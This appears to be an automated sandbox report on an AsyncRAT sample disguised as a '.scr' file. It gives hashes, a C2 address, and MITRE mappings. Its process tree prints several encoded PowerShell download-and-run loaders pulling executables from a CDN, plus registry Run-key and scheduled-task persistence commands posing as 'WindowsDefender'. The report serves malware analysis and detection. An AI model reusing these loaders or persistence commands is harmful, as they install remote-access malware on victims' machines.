asyncrat | 3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74

Analysis

max time kernel
2s
max time network
32s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
21-11-2023 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Venom Control Client‮nls..scr
Size

571KB
MD5

f1bc7841474849a77e8e0b2e507f2ac7
SHA1

eea072584a9227f763d15d784eb52c64453c9505
SHA256

3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74
SHA512

e9d342ea6620fc1b69868d5b503363a685a50e7184ba28c310f9648b85ebbb3684eb5be08ff5dd678e1026499fe2c562eb45b0c28228e96b7746553f6a1d12b7
SSDEEP

12288:C7oVrmFrSStI0kPUjGn61DfVwZ3pSOPXb2c1wxC3Si+hjTO6HH:3i/i4Jt9wZ3/bTwxQgVTOOH

Score

10^/10

asyncrat microsoftedg microsoftedge rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

MicrosoftEdg

46.1.103.69:9371

Mutex

MicrosoftEdg

Attributes

delay
3
install
false
install_file
MicrosoftEdge
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

MicrosoftEdge

46.1.103.69:9371

Mutex

MicrosoftEdge

Attributes

delay
3
install
false
install_file
MicrosoftEdge
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/332-230-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4780-539-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4244-0-0x00007FF615DE0000-0x00007FF615F44000-memory.dmp	upx
behavioral2/memory/4244-61-0x00007FF615DE0000-0x00007FF615F44000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3012	schtasks.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4244 wrote to memory of 3800	4244	Venom Control Client‮nls..scr	71
PID 4244 wrote to memory of 3800	4244	Venom Control Client‮nls..scr	71

C:\Users\Admin\AppData\Local\Temp\Venom Control Client‮nls..scr
"C:\Users\Admin\AppData\Local\Temp\Venom Control Client‮nls..scr" /S
1⤵
- Suspicious use of WriteProcessMemory
PID:4244
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\uvOZtWSKTJ.sln
  2⤵
  PID:3800
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\njrrHqcMC4.exe
  2⤵
  PID:3488
- - C:\Users\Admin\AppData\Local\Temp\njrrHqcMC4.exe
    C:\Users\Admin\AppData\Local\Temp\njrrHqcMC4.exe
    3⤵
    PID:2208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADUANQA3ADYANwAyADAANgA5ADcANAA1ADkANQAwADkAMwAvADEAMQA3ADYANAA2ADkAOQAyADgAMQA1ADMANAA2ADkAMAAyADgALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHgAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAZwBxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAZwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAG4AdQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHcAegBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGQAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARgBKADMAMgAuAGUAeABlACcAKQA8ACMAagB5AHcAIwA+AA=="
      4⤵
      PID:4408
    - - C:\Users\Admin\AppData\Roaming\1HFJ32.exe
        
        "C:\Users\Admin\AppData\Roaming\1HFJ32.exe"
        5⤵
        
        PID:1156
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\1nAvJGuGRn.exe
  2⤵
  PID:4124
- - C:\Users\Admin\AppData\Local\Temp\1nAvJGuGRn.exe
    C:\Users\Admin\AppData\Local\Temp\1nAvJGuGRn.exe
    3⤵
    PID:4992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADIANQAxADYAMgA5ADEAMwA4ADIAMgAvAEQAcwBGAHIAQQBLAE4AWABtAFcALgBlAHgAZQAnACwAIAA8ACMAdQBwAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAHkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHQAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAGMAbAB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGQAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApADwAIwBqAHEAYQAjAD4A"
      4⤵
      PID:2712
    - - C:\Users\Admin\AppData\Roaming\2HGFJ32.exe
        
        "C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"
        5⤵
        
        PID:164
      - C:\Users\Admin\AppData\Roaming\2HGFJ32.exe
        
        "C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"
        6⤵
        
        PID:4780
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\TvUuXKXZu2.exe
  2⤵
  PID:3324
- - C:\Users\Admin\AppData\Local\Temp\TvUuXKXZu2.exe
    C:\Users\Admin\AppData\Local\Temp\TvUuXKXZu2.exe
    3⤵
    PID:1992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwB3ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADAAMwAyADYAMAAyADcAMAA2ADAAMgAvAFcAaQBuAGwAbwBnAG8AbgAuAGUAeABlACcALAAgADwAIwBqAGUAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAawB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAYgB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAcQB1AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABiAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHgAegBlACMAPgA="
      4⤵
      PID:1420
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\NLuEvZWRNy.exe
  2⤵
  PID:4240
- - C:\Users\Admin\AppData\Local\Temp\NLuEvZWRNy.exe
    C:\Users\Admin\AppData\Local\Temp\NLuEvZWRNy.exe
    3⤵
    PID:4836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAegBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADkAMwAzADEAOQA3ADcANAAyADAAOAAvAGoAaABzAGQALgBlAHgAZQAnACwAIAA8ACMAcAB0AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHoAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGoAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARwBHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAagBqAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBrAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAZgBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABHAEcARgBKADMAMgAuAGUAeABlACcAKQA8ACMAeAB3AGoAIwA+AA=="
      4⤵
      PID:924
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\v4UYexxjLt.exe
  2⤵
  PID:3484
- - C:\Users\Admin\AppData\Local\Temp\v4UYexxjLt.exe
    C:\Users\Admin\AppData\Local\Temp\v4UYexxjLt.exe
    3⤵
    PID:1004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYwByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADAAMQA0ADEANAAxADYAOAA2ADIANgAvAGUAbABlAGMAaQBpAHAAaQBjAGwALgBlAHgAZQAnACwAIAA8ACMAcQBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGsAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGcAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwBjAHcAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAGMAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB1AHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHAAYgBqACMAPgA="
      4⤵
      PID:4572
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\7Cz9XWibyU.exe
  2⤵
  PID:4660
- - C:\Users\Admin\AppData\Local\Temp\7Cz9XWibyU.exe
    C:\Users\Admin\AppData\Local\Temp\7Cz9XWibyU.exe
    3⤵
    PID:4808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdwBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADcAMwA2ADcAOAA4ADAAOQAxADUANwA2ADUAMgAvAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQA/AGUAeAA9ADYANQA2AGUAZgBmADcAZQAmAGkAcwA9ADYANQA1AGMAOABhADcAZQAmAGgAbQA9ADQANgBkAGMANQBlAGMAMwA1ADkAZgA4AGEANgA2AGYAMAA4AGUAZQBmAGQANgA0ADIAZgA2AGYANAA0ADIANAA4ADQANAA0ADAAYgBiADIANAA0AGIAYwBhADcANAAwAGUAMAA0ADYAYwAzADMAMwBjADcAOQAyADEAYQA1ADgAJgAnACwAIAA8ACMAYwBqAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHYAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwByAHAAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGEAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBiAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAGIAdwB4ACMAPgA="
      4⤵
      PID:2588
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\14jusfcuVU.exe
  2⤵
  PID:3748
- - C:\Users\Admin\AppData\Local\Temp\14jusfcuVU.exe
    C:\Users\Admin\AppData\Local\Temp\14jusfcuVU.exe
    3⤵
    PID:3436

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsDefender';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsDefender' -Value '"C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe"' -PropertyType 'String'
1⤵
PID:1044

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WindowsDefender /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3012

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
1⤵
PID:332

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WindowsDefender /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
1⤵
PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\v4UYexxjLt.exe.log

Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2HGFJ32.exe.log

Filesize
617B

MD5
4b1382f82cb506f36d30c01d5d515bca

SHA1
621aeafd1d115a27c71dd58c6211716c9640aba6

SHA256
d01a9a6d2f90166ffccd93ebf12c3ba6dd2ab12a9c047a6449d5968cc92d4200

SHA512
8700fd86011f3af3467ccb6c6d6c56f4004aada7a82186047dbba1cb01c3a2344213ecb1f1c67f3e20d269a79b0e61238b043a363047b050eecbd84bba4e65a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
712b92b719a25d0f032f1d66e4c329f8

SHA1
60087d26cc4a6f5897bda9cab67e629064c36a1e

SHA256
94f5bb0dff42f68f3b8aff9f43e3c90c08bb9624465febde48699baebe86bcdf

SHA512
fc7d15e1a58a8320d5118743b014e5011e8c0352f6c19413310684fcb2fc02fe31751ba1d2cd865c1ba103f1afc90e095f7f077d21ba4d3ca64f16824a36e050

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d8a1440d19001edc445a57168d5d2fdb

SHA1
042a2b0d1539add87992bea319ed3c3470cac44a

SHA256
45f03e0ffbe7061b91d39b382fc364941158d6a1355a6c6010bce76a403f9d22

SHA512
4edbed7f1a808ea8fb8584f305c2fb0ff13c498b6cba36d7a15f15ef620f549dbfb97803fb88af7b6a3d49a3d8cfeaaee45ce27567459aca4570fb9e1b26040c

Download Submit
C:\Users\Admin\AppData\Local\Temp\14jusfcuVU.exe

Filesize
14KB

MD5
4a6cbc09917c9cd3f0ffa5d702cb82f7

SHA1
bf4dbc4e763c9de0d99264537f307b602d66fedf

SHA256
e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1

SHA512
67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

Download Submit
C:\Users\Admin\AppData\Local\Temp\14jusfcuVU.exe

Filesize
14KB

MD5
4a6cbc09917c9cd3f0ffa5d702cb82f7

SHA1
bf4dbc4e763c9de0d99264537f307b602d66fedf

SHA256
e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1

SHA512
67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

Download Submit
C:\Users\Admin\AppData\Local\Temp\1nAvJGuGRn.exe

Filesize
5KB

MD5
a25afcfcab5014e3b1c1d00be2ed1c98

SHA1
33b01c0c85791e70deab178c307b976856a53f17

SHA256
18c04e1e7011010cc0cf983dda84804c03bb1de35adff177614f6a4d537f5e6d

SHA512
2a90d06ffd8b9dc086ab5000ba988a66b532ef0918e7e4b24fda564af5b1a1c4ff4bf2243f2bea986ae81272a8868401996aafcc3576e624e721e0d34466410e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1nAvJGuGRn.exe

Filesize
5KB

MD5
a25afcfcab5014e3b1c1d00be2ed1c98

SHA1
33b01c0c85791e70deab178c307b976856a53f17

SHA256
18c04e1e7011010cc0cf983dda84804c03bb1de35adff177614f6a4d537f5e6d

SHA512
2a90d06ffd8b9dc086ab5000ba988a66b532ef0918e7e4b24fda564af5b1a1c4ff4bf2243f2bea986ae81272a8868401996aafcc3576e624e721e0d34466410e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7Cz9XWibyU.exe

Filesize
6KB

MD5
887c8ab2ee3e223da282a35dec64a61f

SHA1
ec43ea5d449853c514c527ba55a26e677795b8a9

SHA256
1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6

SHA512
7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\7Cz9XWibyU.exe

Filesize
6KB

MD5
887c8ab2ee3e223da282a35dec64a61f

SHA1
ec43ea5d449853c514c527ba55a26e677795b8a9

SHA256
1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6

SHA512
7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\NLuEvZWRNy.exe

Filesize
5KB

MD5
0e2c37cc209fd52cce861928d859ab2d

SHA1
773ce4304e33a6cd74432572472244d8bf8e2d14

SHA256
081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051

SHA512
9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\NLuEvZWRNy.exe

Filesize
5KB

MD5
0e2c37cc209fd52cce861928d859ab2d

SHA1
773ce4304e33a6cd74432572472244d8bf8e2d14

SHA256
081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051

SHA512
9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TvUuXKXZu2.exe

Filesize
5KB

MD5
3ed2b4079de8367146d73a4eabbb527b

SHA1
59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038

SHA256
cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be

SHA512
f7a6e86c1a33e212c932a0a7f3f2674018ed8a48ccd24380ee2a199a0c9133971577d6c7cc93e1ea8294bc68657bbcb8342b8f103dc201a3d37602a8882d5a8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TvUuXKXZu2.exe

Filesize
5KB

MD5
3ed2b4079de8367146d73a4eabbb527b

SHA1
59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038

SHA256
cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be

SHA512
f7a6e86c1a33e212c932a0a7f3f2674018ed8a48ccd24380ee2a199a0c9133971577d6c7cc93e1ea8294bc68657bbcb8342b8f103dc201a3d37602a8882d5a8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oifdoshn.k2r.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\njrrHqcMC4.exe

Filesize
6KB

MD5
a75b85a9502a6933aa0a9873ac3a6df0

SHA1
b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed

SHA256
940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701

SHA512
cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

Download Submit
C:\Users\Admin\AppData\Local\Temp\njrrHqcMC4.exe

Filesize
6KB

MD5
a75b85a9502a6933aa0a9873ac3a6df0

SHA1
b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed

SHA256
940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701

SHA512
cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

Download Submit
C:\Users\Admin\AppData\Local\Temp\uvOZtWSKTJ.sln

Filesize
1KB

MD5
49e83452237bee03b19fcf08da6f1d9c

SHA1
6ab1082f3e64030b998cb1202b77e0817e051f9b

SHA256
97befc6c51ae1ea71ba40f0a0ae8bad63d45522d121cfa7bdac024d40351fdcf

SHA512
80d05f957efa5ff437f6cce58d77a2c59e8c0034eecaa05a3dcd0b8f1e95964c2c726886f800d002249650629bf48dc767652ee897b717c2edee2e55acb71bc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\v4UYexxjLt.exe

Filesize
6KB

MD5
142a3cc69d15044024d4ccd3282e20f6

SHA1
a2ebe1b4cddc1012ba96c8e4dc0905d95501f69b

SHA256
dccd94fcb5cd38b6077af35e7e85aaa867f263a9d00910197388e11e71c6b5e3

SHA512
9da05e395f0636b90d1c9132d485ca75bbb1a2bccfe46b1ae0c1bab6e5101928a2b548786e66aebde27e5b005ccdf0c48592b87659f7688a1976a70c1982ca6f

Download Submit
